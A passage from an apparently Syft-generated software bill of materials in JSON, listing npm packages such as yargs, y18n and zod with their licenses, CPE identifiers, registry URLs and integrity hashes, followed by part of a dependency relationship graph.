sl@2.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz","integrity":"sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ==","dependencies":null}},{"id":"6f2d4b5e4aa5bc10","name":"xtend","version":"4.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/xtend@4.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz","integrity":"sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==","dependencies":null}},{"id":"f92fb588898c98cc","name":"y18n","version":"4.0.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/y18n@4.0.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz","integrity":"sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==","dependencies":null}},{"id":"17090a29739955b3","name":"y18n","version":"5.0.8","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/y18n@5.0.8","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz","integrity":"sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==","dependencies":null}},{"id":"c85ae4ebdc6284ae","name":"yallist","version":"4.0.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/yallist@4.0.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz","integrity":"sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==","dependencies":null}},{"id":"bbb181fdab2eb6da","name":"yargs","version":"15.4.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/yargs@15.4.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz","integrity":"sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==","dependencies":{"cliui":"^6.0.0","decamelize":"^1.2.0","find-up":"^4.1.0","get-caller-file":"^2.0.1","require-directory":"^2.1.1","require-main-filename":"^2.0.0","set-blocking":"^2.0.0","string-width":"^4.2.0","which-module":"^2.0.0","y18n":"^4.0.0","yargs-parser":"^18.1.2"}}},{"id":"c2726c8cb18290f2","name":"yargs","version":"17.7.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/yargs@17.7.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz","integrity":"sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==","dependencies":{"cliui":"^8.0.1","escalade":"^3.1.1","get-caller-file":"^2.0.5","require-directory":"^2.1.1","string-width":"^4.2.3","y18n":"^5.0.5","yargs-parser":"^21.1.1"}}},{"id":"385fd2e9c795bcc7","name":"yargs-parser","version":"18.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/yargs-parser@18.1.3","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz","integrity":"sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==","dependencies":{"camelcase":"^5.0.0","decamelize":"^1.2.0"}}},{"id":"95c25d265eed6eaf","name":"yargs-parser","version":"21.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"ISC","spdxExpression":"ISC","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:*","source":"nvd-cpe-dictionary"}],"purl":"pkg:npm/yargs-parser@21.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz","integrity":"sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==","dependencies":null}},{"id":"813268dedfe3539f","name":"yocto-queue","version":"0.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/yocto-queue@0.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz","integrity":"sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==","dependencies":null}},{"id":"579e04e050802ec1","name":"yoga-layout","version":"2.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/yoga-layout@2.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz","integrity":"sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q==","dependencies":null}},{"id":"c30d59c73bdda635","name":"zod","version":"3.25.76","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/zod@3.25.76","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/zod/-/zod-3.25.76.tgz","integrity":"sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==","dependencies":null}}],"artifactRelationships":[{"parent":"0055323086e6dbe0","child":"15064a64821e35da","type":"dependency-of"},{"parent":"0055323086e6dbe0","child":"19aa56c736ba6f4e","type":"dependency-of"},{"parent":"0055323086e6dbe0","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0128eed2457b60d1","child":"533995aeaf2ae857","type":"dependency-of"},{"parent":"0128eed2457b60d1","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"013c8659dba6bad8","child":"4688a05ee871df84","type":"dependency-of"},{"parent":"013c8659dba6bad8","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"014369d0efdc09b2","child":"01aea657af389bb4","type":"dependency-of"},{"parent":"014369d0efdc09b2","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"01ac139389c8bf08","child":"15c7effc6183b848","type":"dependency-of"},{"parent":"01ac139389c8bf08","child":"2485766b0114da33","type":"dependency-of"},{"parent":"01ac139389c8bf08","child":"405f6eb700866b5f","type":"dependency-of"},{"parent":"01ac139389c8bf08","child":"98bcef2cdcc9941a","type":"dependency-of"},{"parent":"01ac139389c8bf08","child":"d0ebbd8a4bc7ada1","type":"dependency-of"},{"parent":"01ac139389c8bf08","child":"e689757d7bf8470d","type":"dependency-of"},{"parent":"01ac139389c8bf08","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"01aea657af389bb4","child":"51dda2f8a6d52783","type":"dependency-of"},{"parent":"01aea657af389bb4","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0246497cf4065c27","child":"014369d0efdc09b2","type":"dependency-of"},{"parent":"0246497cf4065c27","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0272e47fa12e3e5d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0277554910df9b38","child":"47f001cd3ecd3ee8","type":"dependency-of"},{"parent":"0277554910df9b38","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"02974b3dbbe4d3d6","child":"3344aade71052029","type":"dependency-of"},{"parent":"02974b3dbbe4d3d6","child":"cefeafe40657f94b","type":"dependency-of"},{"parent":"02974b3dbbe4d3d6","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"02ed6bf0c016d0d3","child":"775c553ab4f0a485","type":"dependency-of"},{"parent":"02ed6bf0c016d0d3","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"03465a3bffd322b9","child":"2e420341fd4164af","type":"dependency-of"},{"parent":"03465a3bffd322b9","child":"3e1fba314601b9a8","type":"dependency-of"},{"parent":"03465a3bffd322b9","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"03ef00f42507be2f","child":"cefeafe40657f94b","type":"dependency-of"},{"parent":"03ef00f42507be2f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"043761526fd95886","child":"be5a9ebbd8259fbe","type":"dependency-of"},{"parent":"043761526fd95886","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"04b33f5cfaf593a5","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"04b33f5cfaf593a5","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"05272d1e7e2ad4be","child":"83c2ace663a40ea8","type":"dependency-of"},{"parent":"05272d1e7e2ad4be","child":"c5304af01a3223ed","type":"dependency-of"},{"parent":"05272d1e7e2ad4be","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"05997a7e636d9fd8","child":"7b45ff9710a4aaac","type":"dependency-of"},{"parent":"05997a7e636d9fd8","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"05aac3d8e010493a","child":"3344aade71052029","type":"dependency-of"},{"parent":"05aac3d8e010493a","child":"3f87a56430ddd85e","type":"dependency-of"},{"parent":"05aac3d8e010493a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"060c7b7a8f614664","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"06243f2e41cd3912","child":"51dda2f8a6d52783","type":"dependency-of"},{"parent":"06243f2e41cd3912","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"066e44c97461677f","child":"91c59a4a431b283f","type":"dependency-of"},{"parent":"066e44c97461677f","child":"ee26fc9f2aa2694f","type":"dependency-of"},{"parent":"066e44c97461677f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"06c01b9cd08a3446","child":"352073d173d9984f","type":"dependency-of"},{"parent":"06c01b9cd08a3446","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"07274f4b8a4d661e","child":"eb8b761fb0d3a989","type":"dependency-of"},{"parent":"07274f4b8a4d661e","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"07fb83a013bf4ef4","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"07fb83a013bf4ef4","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0827d54a7a5ea1e5","child":"71294da0e67ef2a3","type":"dependency-of"},{"parent":"0827d54a7a5ea1e5","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0872acd31442749a","child":"b26b672319df2e47","type":"dependency-of"},{"parent":"0872acd31442749a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"09943c54769c1f79","child":"0f1f6d6adbfca65a","type":"dependency-of"},{"parent":"09943c54769c1f79","child":"beb5f9a5d33de00e","type":"dependency-of"},{"parent":"09943c54769c1f79","child":"dc31731ddf283ca7","type":"dependency-of"},{"parent":"09943c54769c1f79","child":"ea1b10e091012c4d","type":"dependency-of"},{"parent":"09943c54769c1f79","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"09afc93bd06904eb","child":"e11d2a355e0d2438","type":"dependency-of"},{"parent":"09afc93bd06904eb","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0a49b35ad8071788","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0a7cfe5561f2b18b","child":"7bcabe4027921ced","type":"dependency-of"},{"parent":"0a7cfe5561f2b18b","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0b0e2e978d7d93f4","child":"51dda2f8a6d52783","type":"dependency-of"},{"parent":"0b0e2e978d7d93f4","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0b1fbe7259e117a1","child":"bbb181fdab2eb6da","type":"dependency-of"},{"parent":"0b1fbe7259e117a1","child":"c2726c8cb18290f2","type":"dependency-of"},{"parent":"0b1fbe7259e117a1","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0b617a8d86aea060","child":"34887f26bc3e9d5d","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0b879a880de07100","child":"f96d5af8de184f83","type":"dependency-of"},{"parent":"0b879a880de07100","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0bd59342bab05265","child":"01aea657af389bb4","type":"dependency-of"},{"parent":"0bd59342bab05265","child":"3344aade71052029","type":"dependency-of"},{"parent":"0bd59342bab05265","child":"5100f72eed8a2178","type":"dependency-of"},{"parent":"0bd59342bab05265","child":"5c4492e68f441264","type":"dependency-of"},{"parent":"0bd59342bab05265","child":"9d900b217a57abee","type":"dependency-of"},{"parent":"0bd59342bab05265","child":"cefeafe40657f94b","type":"dependency-of"},{"parent":"0bd59342bab05265","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0c0ba7fcf7a893f6","child":"0f1f6d6adbfca65a","type":"dependency-of"},{"parent":"0c0ba7fcf7a893f6","child":"beb5f9a5d33de00e","type":"dependency-of"},{"parent":"0c0ba7fcf7a893f6","child":"dc31731ddf283ca7","type":"dependency-of"},{"parent":"0c0ba7fcf7a893f6","child":"ea1b10e091012c4d","type":"dependency-of"},{"parent":"0c0ba7fcf7a893f6","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0c5e141c3ee662a0","child":"51dda2f8a6d52783","type":"dependency-of"},{"parent":"0c5e141c3ee662a0","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0cfa30ecdd760351","child":"9a502dcbe994e863","type":"dependency-of"},{"parent":"0cfa30ecdd760351","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0d47a7f43264d12f","child":"9d900b217a57abee","type":"dependency-of"},{"parent":"0d47a7f43264d12f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0d7c80c1e227b7e2","child":"833f3564230327b0","type":"dependency-of"},{"parent":"0d7c80c1e227b7e2","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0db53ea4a0e10790","child":"2485766b0114da33","type":"dependency-of"},{"parent":"0db53ea4a0e10790","child":"98e64f0b2bbef0ce","type":"dependency-of"},{"parent":"0db53ea4a0e10790","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0dc26b5347e8f4df","child":"06f084fd7c9154ab","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0dc9162b75e9df6b","child":"8d6c8207e0a0d1a8","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0debd0f90c403668","child":"f29c1976ad3d8cb0","type":"dependency-of"},{"parent":"0debd0f90c403668","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0e26c2a4fd47f5b6","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0f1f6d6adbfca65a","child":"e6e064efe5c17d2c","type":"dependency-of"},{"parent":"0f1f6d6adbfca65a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"0f98eed7c2a9484e","child":"f76e4353403c9c3d","type":"dependency-of"},{"parent":"0f98eed7c2a9484e","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"10401a0421b092a3","child":"d6075f31d1f26f1b","type":"dependency-of"},{"parent":"10401a0421b092a3","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"104b985242c58dc2","child":"05997a7e636d9fd8","type":"dependency-of"},{"parent":"104b985242c58dc2","child":"59bf565b491e939f","type":"dependency-of"},{"parent":"104b985242c58dc2","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"10b23cab35239c6d","child":"1d81dd407a94f88a","type":"dependency-of"},{"parent":"10b23cab35239c6d","child":"cefeafe40657f94b","type":"dependency-of"},{"parent":"10b23cab35239c6d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"1157d16cad8b2ffc","child":"668b76a592331d7f","type":"dependency-of"},{"parent":"1157d16cad8b2ffc","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"11ebb955a4940d8a","child":"2a2c690594e77e74","type":"dependency-of"},{"parent":"11ebb955a4940d8a","child":"51dda2f8a6d52783","type":"dependency-of"},{"parent":"11ebb955a4940d8a","child":"71e9d3c366707710","type":"dependency-of"},{"parent":"11ebb955a4940d8a","child":"b26b672319df2e47","type":"dependency-of"},{"parent":"11ebb955a4940d8a","child":"f54f88caa8e97b5c","type":"dependency-of"},{"parent":"11ebb955a4940d8a","child":"fb550e5d7052cd7e","type":"dependency-of"},{"parent":"11ebb955a4940d8a","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"122ede063714b5b3","child":"eb8b761fb0d3a989","type":"dependency-of"},{"parent":"122ede063714b5b3","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"12a6d95fe5a62fc1","child":"a5b5323abf9aae9f","type":"dependency-of"},{"parent":"12a6d95fe5a62fc1","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"12d1ed2dd95a1a7c","child":"2d10e944bb8687bf","type":"dependency-of"},{"parent":"12d1ed2dd95a1a7c","child":"91bc09c317f85f97","type":"dependency-of"},{"parent":"12d1ed2dd95a1a7c","child":"ac843d04db23cee1","type":"dependency-of"},{"parent":"12d1ed2dd95a1a7c","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"12d3bfff6ef69b2c","child":"e6e064efe5c17d2c","type":"dependency-of"},{"parent":"12d3bfff6ef69b2c","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"132a500346fcea0c","child":"01ac139389c8bf08","type":"dependency-of"},{"parent":"132a500346fcea0c","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"14ac0fadd6b69d11","child":"deca1a198ab80d23","type":"dependency-of"},{"parent":"14ac0fadd6b69d11","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"14c55cee8eb4e77f","child":"98e64f0b2bbef0ce","type":"dependency-of"},{"parent":"14c55cee8eb4e77f","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"14d8b5cbe6162ddd","child":"043761526fd95886","type":"dependency-of"},{"parent":"14d8b5cbe6162ddd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"15064a64821e35da","child":"3103913e34f4201d","type":"dependency-of"},{"parent":"15064a64821e35da","child":"d2a573a75d297737","type":"dependency-of"},{"parent":"15064a64821e35da","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"154697ca4fb19b8b","child":"7fed8e7a1bc916bb","type":"dependency-of"},{"parent":"154697ca4fb19b8b","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"157e4f935702d7be","child":"4688a05ee871df84","type":"dependency-of"},{"parent":"157e4f935702d7be","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"15c7effc6183b848","child":"646f82a1b8ded3b2","type":"dependency-of"},{"parent":"15c7effc6183b848","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"1644b4942c7696f6","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"1644b4942c7696f6","child":"756085ffd4026f3c","type":"dependency-of"},{"parent":"1644b4942c7696f6","child":"e6e064efe5c17d2c","type":"dependency-of"},{"parent":"1644b4942c7696f6","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"16f11e75cb882477","child":"4180007fa4dbcaa3","type":"dependency-of"},{"parent":"16f11e75cb882477","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"17090a29739955b3","child":"bbb181fdab2eb6da","type":"dependency-of"},{"parent":"17090a29739955b3","child":"c2726c8cb18290f2","type":"dependency-of"},{"parent":"17090a29739955b3","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"17b9850959841637","child":"24d45580f4c0f7bb","type":"dependency-of"},{"parent":"17b9850959841637","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"18556628c2ed871d","child":"414763db2a64d1aa","type":"dependency-of"},{"parent":"18556628c2ed871d","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"18694a13e91dacfb","child":"3103913e34f4201d","type":"dependency-of"},{"parent":"18694a13e91dacfb","child":"3e1fba314601b9a8","type":"dependency-of"},{"parent":"18694a13e91dacfb","child":"bfc90f0951098a84","type":"dependency-of"},{"parent":"18694a13e91dacfb","child":"d2a573a75d297737","type":"dependency-of"},{"parent":"18694a13e91dacfb","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"18ad44792e37660e","child":"a9792237818f8415","type":"dependency-of"},{"parent":"18ad44792e37660e","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"18c3431d6798a7cd","child":"352073d173d9984f","type":"dependency-of"},{"parent":"18c3431d6798a7cd","child":"74a57b2250b339b3","type":"dependency-of"},{"parent":"18c3431d6798a7cd","child":"83c2ace663a40ea8","type":"dependency-of"},{"parent":"18c3431d6798a7cd","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"198a07fe3b41a7bb","child":"338eac46e71d483e","type":"dependency-of"},{"parent":"198a07fe3b41a7bb","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"19aa56c736ba6f4e","child":"3103913e34f4201d","type":"dependency-of"},{"parent":"19aa56c736ba6f4e","child":"d2a573a75d297737","type":"dependency-of"},{"parent":"19aa56c736ba6f4e","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"19d61645d0264090","child":"32aacf96124c437a","type":"dependency-of"},{"parent":"19d61645d0264090","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"1a0b07449dd69139","child":"fd71c2238fc07657","type":"evident-by","metadata":{"kind":"primary"}},{"parent":"1a954d92edb2b14f","child":"3344aade71052029","type":"dependency-of"},{"parent":"1a954d92edb2b14f","child":"3f87a56430ddd85e","